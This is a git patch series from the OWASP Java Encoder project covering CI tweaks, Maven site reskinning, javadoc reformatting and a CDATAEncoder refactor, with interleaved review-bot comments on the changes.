From: Jeremy Long Date: Sat, 11 Feb 2017 14:33:45 -0500 Subject: debugging CI --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 91d665a..ba456f5 100644 --- a/.travis.yml +++ b/.travis.yml @@ -3,4 +3,4 @@ jdk: - oraclejdk8 - oraclejdk7 - openjdk6 -script: mvn test -B +script: mvn test -B -X -- cgit v1.2.3 From 123bace3eb9a71ecf60c0b08fd872b6b7ff6d72a Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:39:50 -0500 Subject: debugging CI --- pom.xml | 1 + 1 file changed, 1 insertion(+) diff --git a/pom.xml b/pom.xml index a37e0d8..d511912 100755 --- a/pom.xml +++ b/pom.xml @@ -276,6 +276,7 @@ org/owasp/encoder/BenchmarkTest.java + -Xmx1024m -XX:MaxPermSize=256m -- cgit v1.2.3 From 50d21d2b9e966444912ab606bc2953e13008e945 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:43:27 -0500 Subject: added build status --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5817cee..55fc80e 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ OWASP Java Encoder Project ========================== -[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) +[![Build Status](https://travis-ci.org/OWASP/owasp-java-encoder.svg?branch=master)](https://travis-ci.org/OWASP/owasp-java-encoder) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) Contextual Output Encoding is a computer programming technique necessary to stop Cross Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage. -- cgit v1.2.3 From 8b23ab69c7b27523c9df29d52dc286581851eedd Mon Sep 17 00:00:00 2001 
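Review bot: The `-X` added in `script: mvn test -B -X` is Maven's debug switch; it prints the resolved configuration of every plugin execution and the full dependency resolution into the public Travis log on every build, far more than the "debugging CI" subject needs once the problem is found. If the CI environment ever carries credentials through settings or properties, that debug output is where they would be echoed. Revert to `script: mvn test -B` once the issue is diagnosed, or keep the flag on a throwaway branch rather than in the committed configuration.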
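Review bot: The JVM options added next to the BenchmarkTest exclusion include `-XX:MaxPermSize=256m`, which one of the JDKs in the CI matrix added earlier in this series (`oraclejdk8`) does not support: JDK 8 removed the permanent generation and ignores the option with a warning, so on that JDK the flag does nothing and only adds noise to the log. If the intent is to avoid memory exhaustion on JDK 6/7 it is harmless there, but a one-line XML comment saying so would stop the next maintainer from assuming it is load-bearing on 8+. The enclosing element name is not visible in this rendering (presumably surefire's `argLine`), so I cannot confirm where the options are applied.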
From: Jeremy Long Date: Sat, 11 Feb 2017 16:20:53 -0500 Subject: updated site --- core/src/site/site.xml | 7 ++++++- esapi/src/site/site.xml | 7 ++++++- jsp/src/site/site.xml | 7 ++++++- pom.xml | 7 ++++++- src/site/resources/images/owasp.jpg | Bin 0 -> 11488 bytes src/site/site.xml | 25 ++++++++++--------------- 6 files changed, 34 insertions(+), 19 deletions(-) create mode 100644 src/site/resources/images/owasp.jpg diff --git a/core/src/site/site.xml b/core/src/site/site.xml index b465001..df4ef60 100644 --- a/core/src/site/site.xml +++ b/core/src/site/site.xml @@ -37,7 +37,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - Encoder + OWASP Java Encoder Project: CORE + OWASP Java Encoder Project: CORE + OWASP Java Encoder Project: CORE + ../images/owasp.jpg + 107 + 300 diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml index 877ac16..65ffdba 100644 --- a/esapi/src/site/site.xml +++ b/esapi/src/site/site.xml @@ -37,7 +37,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - ESAPI + OWASP Java Encoder Project: ESAPI + OWASP Java Encoder Project: ESAPI + OWASP Java Encoder Project: ESAPI + ../images/owasp.jpg + 107 + 300 diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml index 4b3621d..a16f931 100644 --- a/jsp/src/site/site.xml +++ b/jsp/src/site/site.xml @@ -37,7 +37,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - JSP + OWASP Java Encoder Project: JSP + OWASP Java Encoder Project: JSP + OWASP Java Encoder Project: JSP + ../images/owasp.jpg + 107 + 300 diff --git a/pom.xml b/pom.xml index d511912..3985299 100755 --- a/pom.xml +++ b/pom.xml @@ -309,10 +309,15 @@ org.apache.maven.plugins maven-site-plugin + + org.apache.maven.doxia + doxia-core + 1.7 + org.apache.maven.doxia doxia-module-markdown - 1.6 + 1.7 diff --git a/src/site/resources/images/owasp.jpg b/src/site/resources/images/owasp.jpg new file mode 100644 index 0000000..addae89 Binary files /dev/null and b/src/site/resources/images/owasp.jpg differ 
diff --git a/src/site/site.xml b/src/site/site.xml index a389c70..2df1953 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -39,7 +39,7 @@ OF THE POSSIBILITY OF SUCH DAMAGE. org.apache.maven.skins maven-fluido-skin - 1.3.1 + 1.6 @@ -55,9 +55,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. OWASP Java Encoder Project + OWASP Java Encoder Project OWASP Java Encoder Project - - + ./images/owasp.jpg + 107 + 300 + @@ -65,19 +68,11 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + img="/images/logos/build-by-maven-white.png"/> - - - - + @@ -87,6 +82,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. -
                    Copyright © 2011-2015 OWASP. All Rights Reserved.
                    +
                    Copyright © 2011-2017 OWASP. All Rights Reserved.
                    -- cgit v1.2.3 From 90be286ea76a6fa9c94636590a70ba56f4d6649b Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 13 Feb 2017 09:16:54 -0500 Subject: updated maven site to use reflow --- core/pom.xml | 2 +- core/src/main/java/org/owasp/encoder/Encode.java | 302 +++++++++++------------ core/src/site/markdown/index.md | 35 +++ core/src/site/site.xml | 16 -- esapi/pom.xml | 2 +- esapi/src/site/site.xml | 18 +- jsp/pom.xml | 2 +- jsp/src/site/markdown/index.md | 31 +++ jsp/src/site/site.xml | 16 -- pom.xml | 40 +-- src/site/markdown/index.md | 56 +++++ src/site/site.xml | 77 +++--- 12 files changed, 336 insertions(+), 261 deletions(-) create mode 100644 core/src/site/markdown/index.md create mode 100644 jsp/src/site/markdown/index.md create mode 100644 src/site/markdown/index.md diff --git a/core/pom.xml b/core/pom.xml index 7fafdac..edd9bb5 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -49,7 +49,7 @@ encoder jar - OWASP Encoders + Java Encoder The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 3e3dc59..1d3d406 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -78,41 +78,40 @@ public final class Encode { * <input value="<%=Encode.forHtml(unsafeData)%>" /> * * - *
                    Encoding Description
                    Input Character
                    U+0026&U+0026&\x26Ampersand character
                    U+002F/\/This encoding is used to avoid an input sequence - * "</" from prematurely terminating a </script> + * "</" from prematurely terminating a </script> * block.
                    + *
                    * * - * - * - * + * + * + * * * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * * *
                    Encoding Table
                    InputResult
                    InputResult
                    “{@code &}”“{@code &}”
                    {@code &}{@code &}
                    “{@code <}”“{@code <}”
                    {@code <}{@code <}
                    “{@code >}”“{@code >}”
                    {@code >}{@code >}
                    “{@code "}”“{@code "}”
                    {@code "}{@code "}
                    “{@code '}”“{@code '}”
                    {@code '}{@code '}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • The encoding of the greater-than sign ({@code >}) is not * strictly required, but is included for maximum * compatibility.
                    • @@ -132,7 +131,6 @@ public final class Encode { * as they could lead to parsing errors. In particular only {@code #x9 * | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | * [#x10000-#x10FFFF]} are considered valid. - * *
                    * * @param input the data to encode @@ -164,33 +162,32 @@ public final class Encode { *
                          *     <div><%=Encode.forHtmlContent(unsafeData)%></div>
                          * 
                    - * + *
                    * * - * - * - * + * + * + * * * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * * *
                    Encoding Table
                    InputResult
                    InputResult
                    “{@code &}”“{@code &}”
                    {@code &}{@code &}
                    “{@code <}”“{@code <}”
                    {@code <}{@code <}
                    “{@code >}”“{@code >}”
                    {@code >}{@code >}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • Single-quote character ({@code '}) and double-quote * character ({@code "}) do not require encoding in HTML * blocks, unlike other HTML contexts.
                    • @@ -211,7 +208,6 @@ public final class Encode { * as they could lead to parsing errors. In particular only {@code #x9 * | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | * [#x10000-#x10FFFF]} are considered valid. - * *
                    * * @param input the input to encode @@ -243,37 +239,36 @@ public final class Encode { * <div><%=Encode.forHtml(unsafeData)%></div> * * - * + *
                    * * - * - * - * + * + * + * * * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * * *
                    Encoding Table
                    InputResult
                    InputResult
                    “{@code &}”“{@code &}”
                    {@code &}{@code &}
                    “{@code <}”“{@code <}”
                    {@code <}{@code <}
                    “{@code "}”“{@code "}”
                    {@code "}{@code "}
                    “{@code '}”“{@code '}”
                    {@code '}{@code '}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • Both the single-quote character ({@code '}) and the * double-quote character ({@code "}) are encoded so this is safe * for HTML attributes with either enclosing character.
                    • @@ -296,7 +291,6 @@ public final class Encode { * as they could lead to parsing errors. In particular only {@code #x9 * | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | * [#x10000-#x10FFFF]} are considered valid. - * *
                    * * @param input the input to encode @@ -344,46 +338,45 @@ public final class Encode { * <input value=<%=Encode.forHtmlUnquotedAttribute(input)%> > * * - * + *
                    * * - * - * - * + * + * + * * * * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * * *
                    Encoding Table
                    InputResult
                    InputResult
                    {@code U+0009} (horizontal tab)“{@code }”
                    {@code U+000A} (line feed)“{@code }”
                    {@code U+000C} (form feed)“{@code }”
                    {@code U+000D} (carriage return)“{@code }”
                    {@code U+0020} (space)“{@code }”
                    “{@code &}”“{@code &}”
                    “{@code <}”“{@code <}”
                    “{@code >}”“{@code >}”
                    “{@code "}”“{@code "}”
                    “{@code '}”“{@code '}”
                    “{@code /}”“{@code /}”
                    “{@code =}”“{@code =}”
                    “{@code `}”“{@code `}”
                    {@code U+0085} (next line)“{@code …}”
                    {@code U+2028} (line separator)“{@code 
}”
                    {@code U+2029} (paragraph separator)“{@code 
}”
                    {@code U+0009} (horizontal tab){@code }
                    {@code U+000A} (line feed){@code }
                    {@code U+000C} (form feed){@code }
                    {@code U+000D} (carriage return){@code }
                    {@code U+0020} (space){@code }
                    {@code &}{@code &}
                    {@code <}{@code <}
                    {@code >}{@code >}
                    {@code "}{@code "}
                    {@code '}{@code '}
                    {@code /}{@code /}
                    {@code =}{@code =}
                    {@code `}{@code `}
                    {@code U+0085} (next line){@code …}
                    {@code U+2028} (line separator){@code 
}
                    {@code U+2029} (paragraph separator){@code 
}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • The following characters are not encoded: - * {@code 0-9, a-z, A-Z}, “{@code !}”, “{@code - * #}”, “{@code $}”, “{@code %}”, - * “{@code (}”, “{@code )}”, “{@code - * *}”, “{@code +}”, “{@code ,}”, - * “{@code -}”, “{@code .}”, “{@code - * [}”, “{@code \}”, “{@code ]}”, - * “{@code ^}”, “{@code _}”, “{@code - * }}”.
                    • + * {@code 0-9, a-z, A-Z}, {@code !}, {@code + * #}, {@code $}, {@code %}, + * {@code (}, {@code )}, {@code + * *}, {@code +}, {@code ,}, + * {@code -}, {@code .}, {@code + * [}, {@code \}, {@code ]}, + * {@code ^}, {@code _}, {@code + * }}. * *
                    • Surrogate pairs are passed through only if valid. Invalid * surrogate pairs are replaced by a hyphen (-).
                    • @@ -393,7 +386,6 @@ public final class Encode { * hyphen (-) character. * *
                    • Unicode "non-characters" are replaced by hyphens (-).
                    • - * *
                    * * @param input the attribute value to be encoded. @@ -450,15 +442,15 @@ public final class Encode { * *
                  • The following characters are encoded using hexidecimal * encodings: {@code U+0000} - {@code U+001f}, - * “{@code "}”, - * “{@code '}”, - * “{@code \}”, - * “{@code <}”, - * “{@code &}”, - * “{@code (}”, - * “{@code )}”, - * “{@code /}”, - * “{@code >}”, + * {@code "}, + * {@code '}, + * {@code \}, + * {@code <}, + * {@code &}, + * {@code (}, + * {@code )}, + * {@code /}, + * {@code >}, * {@code U+007f}, * line separator ({@code U+2028}), * paragraph separator ({@code U+2029}).
                  • @@ -528,13 +520,13 @@ public final class Encode { * *
                  • The following characters are encoded using hexidecimal * encodings: {@code U+0000} - {@code U+001f}, - * “{@code "}”, - * “{@code '}”, - * “{@code \}”, - * “{@code <}”, - * “{@code &}”, - * “{@code /}”, - * “{@code >}”, + * {@code "}, + * {@code '}, + * {@code \}, + * {@code <}, + * {@code &}, + * {@code /}, + * {@code >}, * {@code U+007f}, * line separator ({@code U+2028}), * paragraph separator ({@code U+2029}).
                  • @@ -584,13 +576,13 @@ public final class Encode { } /** - * Performs percent-encoding of a URL according to RFC 3986. The provided + *

                    Performs percent-encoding of a URL according to RFC 3986. The provided * URL is assumed to a valid URL. This method does not do any checking on * the quality or safety of the URL itself. In many applications it may * be better to use {@link java.net.URI} instead. Note: this is a * particularly dangerous context to put untrusted content in, as for * example a "javascript:" URL provided by a malicious user would be - * "properly" escaped, and still execute. + * "properly" escaped, and still execute.

                    * * Encoding Table *

                    The following characters are not encoded:

                    @@ -928,78 +920,78 @@ public final class Encode { * </script> * * - * + *
                    * * - * - * - * - * + * + * + * + * * * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * * - * - * - * - * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * * * diff --git a/core/src/site/markdown/index.md b/core/src/site/markdown/index.md new file mode 100644 index 0000000..e3f8f99 --- /dev/null +++ b/core/src/site/markdown/index.md @@ -0,0 +1,35 @@ +## OWASP Java Encoder + +The OWASP Java Encoder is a collection of high-performance low-overhead +contextual encoders that, when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +For use within JSP pages consider using the [JSP Encoder](../encoder-jsp/index.html) as it +provides a TLD to make the use of the core encoders easier. + +### Usage + +The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). + +```xml + + org.owasp.encoder + encoder + 1.2.1 + +``` + +Utilize the encoder: + +```java +import org.owasp.encoder.Encode; + +//... + +PrintWriter out = ....; +out.println(""); +``` diff --git a/core/src/site/site.xml b/core/src/site/site.xml index df4ef60..1b3cb62 100644 --- a/core/src/site/site.xml +++ b/core/src/site/site.xml @@ -36,22 +36,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - - OWASP Java Encoder Project: CORE - OWASP Java Encoder Project: CORE - OWASP Java Encoder Project: CORE - ../images/owasp.jpg - 107 - 300 - - - - - - \ No newline at end of file diff --git a/esapi/pom.xml b/esapi/pom.xml index def23df..c3f9c7c 100644 
--- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -49,7 +49,7 @@ encoder-esapi jar - OWASP Encoders ESAPI Thunk + ESAPI Thunk The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder Projects API into an implementation of ESAPI. diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml index 65ffdba..743ef44 100644 --- a/esapi/src/site/site.xml +++ b/esapi/src/site/site.xml @@ -36,22 +36,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - - OWASP Java Encoder Project: ESAPI - OWASP Java Encoder Project: ESAPI - OWASP Java Encoder Project: ESAPI - ../images/owasp.jpg - 107 - 300 - - - - - - - + \ No newline at end of file diff --git a/jsp/pom.xml b/jsp/pom.xml index 1609f91..74a6efa 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -49,7 +49,7 @@ encoder-jsp jar - OWASP Encoders JSP tags and EL functions + JSP Encoder The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow easy use of the OWASP Encoder Project's core API. The TLDs contain both tag diff --git a/jsp/src/site/markdown/index.md b/jsp/src/site/markdown/index.md new file mode 100644 index 0000000..cc3b6f2 --- /dev/null +++ b/jsp/src/site/markdown/index.md @@ -0,0 +1,31 @@ +## OWASP JSP + +The OWASP JSP Encoder is a collection of high-performance low-overhead +contextual encoders that, when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.1 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

                    Dynamic data via EL: ${e:forHtml(param.value)}

                    +

                    Dynamic data via tag:

                    +``` diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml index a16f931..dde2b60 100644 --- a/jsp/src/site/site.xml +++ b/jsp/src/site/site.xml @@ -36,22 +36,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - - OWASP Java Encoder Project: JSP - OWASP Java Encoder Project: JSP - OWASP Java Encoder Project: JSP - ../images/owasp.jpg - 107 - 300 - - - - - - \ No newline at end of file diff --git a/pom.xml b/pom.xml index 3985299..1cb08dd 100755 --- a/pom.xml +++ b/pom.xml @@ -45,7 +45,7 @@ 1.2.1-SNAPSHOT pom - OWASP Encoders Parent + OWASP Java Encoder Project The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in @@ -183,7 +183,7 @@ org.codehaus.mojo cobertura-maven-plugin - 2.7 + 2.6 org.apache.maven.plugins @@ -208,7 +208,26 @@ org.apache.maven.plugins maven-site-plugin - 3.5.1 + + 3.4 + + + lt.velykis.maven.skins + reflow-velocity-tools + 1.1.1 + + + + org.apache.velocity + velocity + 1.7 + + + org.apache.maven.doxia + doxia-module-markdown + 1.6 + + org.apache.maven.plugins @@ -308,21 +327,6 @@ org.apache.maven.plugins maven-site-plugin - - - org.apache.maven.doxia - doxia-core - 1.7 - - - org.apache.maven.doxia - doxia-module-markdown - 1.7 - - - - true - diff --git a/src/site/markdown/index.md b/src/site/markdown/index.md new file mode 100644 index 0000000..1be294d --- /dev/null +++ b/src/site/markdown/index.md 
@@ -0,0 +1,56 @@ +## OWASP Java Encoder Project + +The OWASP Java Encoder Project is a collection of high-performance low-overhead +contextual encoders, that when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### Usage + +In addition to the usage guidance below, more examples can be found on the [OWASP Java Encoder Project Wiki](https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project). + +The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). + +```xml + + org.owasp.encoder + encoder + 1.2.1 + +``` + +Utilize the encoder: + +```java +import org.owasp.encoder.Encode; + +//... + +PrintWriter out = ....; +out.println(""); +``` + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.1 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

                    Dynamic data via EL: ${e:forHtml(param.value)}

                    +

                    Dynamic data via tag:

                    +``` diff --git a/src/site/site.xml b/src/site/site.xml index 2df1953..f1d4a83 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -37,51 +37,56 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - org.apache.maven.skins - maven-fluido-skin - 1.6 + lt.velykis.maven.skins + reflow-maven-skin + 1.1.1 - - - true - true - - owasp/owasp-java-encoder - right - gray - - - - - + + + OWASP Java Encoder Project OWASP Java Encoder Project OWASP Java Encoder Project ./images/owasp.jpg 107 300 - + + + + default + true + github + + ${project.name} + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + false + top + 6 + Modules|Maven Documentation + + Modules + Contribute + Maven Documentation + + + + + + - - - - - - - - - - - - - - - + + + + + + + + + + +
                    Copyright © 2011-2017 OWASP. All Rights Reserved.
-- cgit v1.2.3 From 789a380d44d1e89826c15e4654650cdab9a05dee Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 14 Feb 2017 08:36:29 -0500 Subject: formating and checkstyle corrections --- .gitignore | 3 +- .../main/java/org/owasp/encoder/CDATAEncoder.java | 166 +++---- .../main/java/org/owasp/encoder/CSSEncoder.java | 16 +- .../java/org/owasp/encoder/ChainedEncoder.java | 2 +- core/src/main/java/org/owasp/encoder/Encode.java | 69 ++- .../main/java/org/owasp/encoder/HTMLEncoder.java | 552 +++++++++++++-------- .../main/java/org/owasp/encoder/JavaEncoder.java | 213 ++++---- .../java/org/owasp/encoder/JavaScriptEncoder.java | 183 ++++--- .../main/java/org/owasp/encoder/URIEncoder.java | 6 +- .../java/org/owasp/encoder/XMLCommentEncoder.java | 15 +- .../main/java/org/owasp/encoder/XMLEncoder.java | 66 ++- pom.xml | 36 +- src/main/config/checkstyle.xml | 4 +- 13 files changed, 765 insertions(+), 566 deletions(-)
diff --git a/.gitignore b/.gitignore
index ae98f63..3a37f93 100644
--- a/.gitignore
+++ b/.gitignore
@@ -12,4 +12,5 @@ maven-eclipse.xml
 .externalToolBuilders
 # Netbeans configuration
 nb-configuration.xml
-/target/
\ No newline at end of file
+/target/
+/core/nbproject/
\ No newline at end of file
diff --git a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java
index 07f54ff..d08014b 100644
--- a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java
+++ b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java
@@ -37,12 +37,16 @@ import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good for including large blocks of text that contain - * characters that normally require encoding (ampersand, quotes, less-than, etc...). The CDATA context however still does not - * allow invalid characters, and can be closed by the sequence "]]>". This encoder removes invalid XML characters, and encodes - * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will - * have to handle multiple CDATA events. As an alternate approach, the caller could pre-encode "]]>" to something of their - * choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML characters. + * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good + * for including large blocks of text that contain characters that normally + * require encoding (ampersand, quotes, less-than, etc...). The CDATA context + * however still does not allow invalid characters, and can be closed by the + * sequence "]]>". This encoder removes invalid XML characters, and encodes + * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is + * maintained, but the code receiving the output will have to handle multiple + * CDATA events. As an alternate approach, the caller could pre-encode "]]>" to + * something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then + * use this encoder to remove any invalid XML characters. * * @author Jeff Ichnowski */ 
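Review bot: The rewrapped class javadoc still says this encoder "removes invalid XML characters", but the array-encoding loop later in this same file (the hunk at old line 180) writes `XMLEncoder.INVALID_CHARACTER_REPLACEMENT` in their place, so invalid characters are substituted, not dropped, and the caller sees a replacement character in the output. Since the commit already rewrites this sentence, it is the right moment to make it accurate, e.g. `This encoder replaces invalid XML characters with XMLEncoder.INVALID_CHARACTER_REPLACEMENT (they are not silently dropped) and encodes "]]>" (to "]]]]><![CDATA[>").` The quoted encoded form should also be checked against the CDATA_END_ENCODED constant, which this diff does not show. The "alternate approach" sentence would benefit from noting that pre-replacing "]]>" changes the data, whereas the encoder's split preserves it.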
@@ -94,33 +98,31 @@ class CDATAEncoder extends Encoder { // // valid } - } else { - if (i + 1 < n) { - if (input.charAt(i + 1) != ']') { - // "]x" (next character is safe for this to be ']') - } else { - // "]]?" - // keep looping through ']' - for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { - // valid - } - // at this point we've looped through a sequence - // of 2 or more "]", if the next character is ">" - // we need to encode "]]>". - if (i + 2 < n) { - if (input.charAt(i + 2) == '>') { - return i; + } else if (i + 1 < n) { + if (input.charAt(i + 1) != ']') { + // "]x" (next character is safe for this to be ']') + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { + // valid + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (input.charAt(i + 2) == '>') { + return i; // } else { // // valid - } - - } else { - return n; } + + } else { + return n; } - } else { - return n; } + } else { + return n; } } else if (ch < Character.MIN_HIGH_SURROGATE) { if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { @@ -145,11 +147,12 @@ class CDATAEncoder extends Encoder { // end of input, high without low = invalid return i; } - } else if ( // low surrogate without preceding high surrogate + } else if (// low surrogate without preceding high surrogate ch <= Character.MAX_LOW_SURROGATE - || // non characters - ch > '\ufffd' - || ('\ufdd0' <= ch && ch <= '\ufdef')) { + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { return i; // } else { // // valid 
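Review bot: The restructured branch keeps an empty then-block, `if (input.charAt(i + 1) != ']') { // "]x" } else { … }`, with all of the work in the else arm; inverting the test to `if (input.charAt(i + 1) == ']') {` and deleting the empty arm reads more directly and matches the flattening the commit already applied to the outer `else if (i + 1 < n)`. Behavior is the same either way: a `]` followed by anything other than `]` needs no encoding, and a run of two or more `]` only matters when `>` follows it. The enclosing method (apparently the String-based scan for the first offset that needs encoding, judging by the `return i` / `return n` pattern) begins before this hunk and continues past it.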
@@ -180,63 +183,61 @@ class CDATAEncoder extends Encoder { } else { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } - } else { - if (i + 1 < n) { - if (in[i + 1] != ']') { - // "]x" (next character is safe for this to be ']') + } else if (i + 1 < n) { + if (in[i + 1] != ']') { + // "]x" (next character is safe for this to be ']') + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && in[i + 2] == ']'; ++i) { if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; - } else { - // "]]?" - // keep looping through ']' - for (; i + 2 < n && in[i + 2] == ']'; ++i) { - if (j >= m) { + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (in[i + 2] == '>') { + if (j + CDATA_END_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } - out[j++] = ']'; - } - // at this point we've looped through a sequence - // of 2 or more "]", if the next character is ">" - // we need to encode "]]>". - if (i + 2 < n) { - if (in[i + 2] == '>') { - if (j + CDATA_END_ENCODED_LENGTH > m) { - return overflow(input, i, output, j); - } - System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); - j += CDATA_END_ENCODED_LENGTH; - i += 2; - } else { - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = ']'; - } - } else if (endOfInput) { - if (j + 2 > m) { + System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); + j += CDATA_END_ENCODED_LENGTH; + i += 2; + } else { + if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; - out[j++] = ']'; - i = n; - break; - } else { - break; } + } else if (endOfInput) { + if (j + 2 > m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + out[j++] = ']'; + i = n; + break; + } else { + break; } - } else if (endOfInput) { - // seen "]", then end of input. 
